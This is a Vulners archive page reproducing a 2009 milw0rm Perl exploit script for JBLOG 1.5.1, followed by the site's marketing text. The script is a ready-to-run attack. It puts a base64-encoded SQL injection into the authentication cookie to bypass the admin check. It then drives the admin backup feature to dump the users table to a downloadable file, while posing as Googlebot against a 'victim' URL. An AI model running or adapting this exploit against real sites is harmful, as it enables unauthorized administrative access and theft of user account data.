Vulners
Lucene search
JBLOG 1.5.1 - Remote SQL Table Backup Exploit
#!/usr/bin/perl
=about
VENDOR
JBLOG 1.5.1
(maybe earlier versions vulnerable too)
http://www.lisijie.org
AUTHOR
discovered & written by Ams
ax330d [doggy] gmail [dot] com
http://www.0x416d73.name/
VULNERABILITY DESCRIPTION
Both 'index.php' and 'admin.php' includes file 'common.php' which checks
for user permission on line 81 via function 'check_user()'.
This function is defined in file 'include/func_user.php'.
There is another one function - 'get_cookie()' which gets cookie values.
So, in cookies we put our evil string and further actions should be clear.
Why we don't filter COOKIEs ?
EXPLOIT WORK
This exploit uses SQL-injection to create dump of users table.
Actually, we are possible to do all administrator actions.
REQUIREMENTS
1. You need to know prefix, by default it is 'jblog_'.
But there is no problem to find it out.
2. Rights to write to 'cache/' folder.
=cut
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use MIME::Base64;
use Getopt::Long;
Banner();
$| = 1;
my $expl_url;
my $prefix = 'jblog_';
my $proxy = '';
GetOptions(
'u=s' => \$expl_url,
'pre=s' => \$prefix,
'p=s' => \$proxy,
) or Usage();
my $spider = LWP::UserAgent->new;
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
$spider->default_header( 'Cookie' => $prefix . 'authkey=' . encode_base64( "1\t' OR 1=1 -- " ) );
$spider->proxy(['http'], "http://$proxy/") if $proxy ne '';
$spider->timeout( 30 );
Exploit( $expl_url);
sub Exploit {
$_ = shift || Usage();
print "\n\tExploiting:\t $_";
my ($prot , $host, $path, )
= m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
$prot ||= 'http';
my $url = "$prot://$host$path";
my $defact = 'admin.php?ac=data&do=bakout&dosubmit=yes&sizelimit=2048';
# First request to prepare
my $req = GET "$url/$defact&baktables%5B%5D=${prefix}user";
my $res = $spider->request( $req );
my ($dir, $file) = $res->content =~ /yes&bakdir=(.*?)&(?:.*?)&filepre=(.*?)'/;
# Second request to dump table
$req = GET "$url/$defact&bakdir=$dir&step=1&baktablestr=${prefix}user&tableid=0&start=0&filepre=$file";
$res = $spider->request( $req );
# Finally checking if sql backup exists
$req = HEAD "$url/cache/backup/$dir/${file}_1.sql";
$res = $spider->request( $req );
if ( $res->is_success ) {
print "\n\tLooks ok, check $prot://$host${path}cache/backup/$dir/${file}_1.sql\n";
} else {
printf(
"\n\tFailure, server response: %s\n\tAnyway, check: %s\n",
$res->status_line, "$prot://$host${path}cache/backup/$dir/${file}_1.sql");
}
}
sub Usage {
print <<USAGE;
Usage:
-u Set url of victim
optional:
-pre Prefix, default 'jblog_' is used if no one mentioned
-p Proxy, set as ip:port
Example:
$0 -u=http://site.com -pre=jblog_ -p=127.0.0.1:8080
USAGE
exit;
}
sub Banner {
print <<BANNER;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
JBLOG 1.5.1 Perl exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
BANNER
}
# milw0rm.com [2009-08-13]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1